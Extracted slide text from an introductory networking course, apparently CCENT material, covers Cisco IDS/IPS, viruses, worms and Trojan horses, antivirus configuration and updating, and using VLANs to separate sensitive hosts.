• "Providing complete intrusion protection, Cisco IDS delivers a comprehensive, pervasive security solution for combating unauthorized intrusions, malicious Internet worms, along with bandwidth and e-Business application attacks."


• On the other hand, the Cisco IPS - Intrusion Prevention System - is described by their website as follows:– "The Cisco Intrusion Prevention System (IPS) solution

is an integral part of the Cisco Self-Defending Network and Cisco Threat Control solutions, providing end-to-end protection. This inline, network-based defense can identify, classify, and stop known and unknown threats, including worms, network viruses, application threats, system intrusion attempts, and application misuse."

131


• If there's one thing you must have working at full capacity in your network, it's the antivirus programs.

• If there's one thing that is commonly overlooked when it comes to updates, it's the antivirus programs.


• In today's world, your network must be protected from both internal and external antivirus threats. By implementing and executing an aggressive antivirus strategy, you can greatly reduce your network's chances of being hit with a virus. Literally hundreds of millions of dollars in productivity are lost every year due to virus attacks, along with a few jobs. Make sure both your network and career are protected!


• Just as a human virus is spread through contact, so is a computer virus. A virus is a program that gets onto a computer without a user's knowledge and then performs an action that can range from mischievous to destructive. For a virus to be spread, there has to be some kind of contact between an infected user and another user - generally, that contact is the forwarding of an email that has an attachment that contains a virus.

132


• A worm is a type of virus, but a worm can spread on its own without any "help" from the infected host. Even worse, a worm can replicate on its own, resulting in many more worms attacking other hosts. A common worm attack involves the worm sending a copy of itself to every single user listed in the infected host's email address book.


• A third, more insidious attacker is the Trojan Horse . In history, the Trojan Horse was presented as a gift to Troy by the Greeks, and it was filled wit h Greek soldiers who attacked once the Horse was taken inside the city's defenses.

• Today's Trojan Horses attack in much the same fashion. The program installed by the user may look legitimate and innocent, but there's another progra m inside just waiting to attack the user's computer.


• It's a good idea to periodically remind your end users about some basic steps they can take to help prevent unleashing a virus:– Don't open email attachments from anyone outside

the company. – Don't download software and install it, especially "fun

and free" software such as gaming programs, animated cursors, etc.

– Don't open email from anyone you don't know.

133


Choosing And Configuring An

Antivirus Program

• I strongly recommend you choose an antivirus program that offers automatic updates. If you rely on manual updates - that is, relying on remembering to go out and check for updates yourself instead of having them automatically downloaded when new updates are available - I can practically guarantee you're going to forget to do so, and this can be a fatal mistake for both your network and your career.


• The #1 mistake network administrators and home PC owners alike make with antivirus software is not keeping the program up-to-date. New viruses are being created every minute of every day, and reputable antivirus program vendors such as Symantec are monitoring that situation, looking for new viruses and writing virus signature updates or virus definitions regularly. (A virus signature is the actual binary pattern of a virus, and just as your signature identifies you, a virus signature identif ies the virus.)


• Even with this protection, 100% protection from viruses isn't guaranteed. There are polymorphic viruses that actually change their own signature each time they replicate, which makes it much more difficult for an antivirus program to identify and eliminate them

134


What Files Should Be Scanned For

Viruses?

• When you configure antivirus software, you'll have the option of setting a time when a virus scan should run on the host, as well as what files should be scanned for viruses. If your network PCs are left on at night, setting the antivirus program to run a full scan at 1 AM is a great idea.


• First on your list should be any file whose extension is .com, .exe, .ocx, or .dll. These are all executable files , which are primary carriers and targets of viruses. I personally like to scan a host's Microsoft Word documents as well, since those files are passed from user to user more often than any other file type.


• If You Turn Anti-Virus Software Off... TURN IT BACK ON!

• Sorry for the yelling, but this is a great way for viruses to sneak into your network.

• Most network administrators have been in a position where they've had to turn the antivirus program off, and you may have installed programs on your own PC where the installation program recommends you to turn the antivirus program off.

135


• And don't forget.... lock up your hardware - literally!


"Hiding" A Sensitive Network

• VLANs aren't just for limiting the scope of broadcasts on your network - they're actually a security feature as well!

• If you have a network in your business that should be hidden from the rest of the network, just put the "secret" hosts in their own VLAN.

Notes

Documents

networking models train

ccent train signal

fundamentals of networking

advanced networking

networking success

networking career

tcpip networking models

use networking models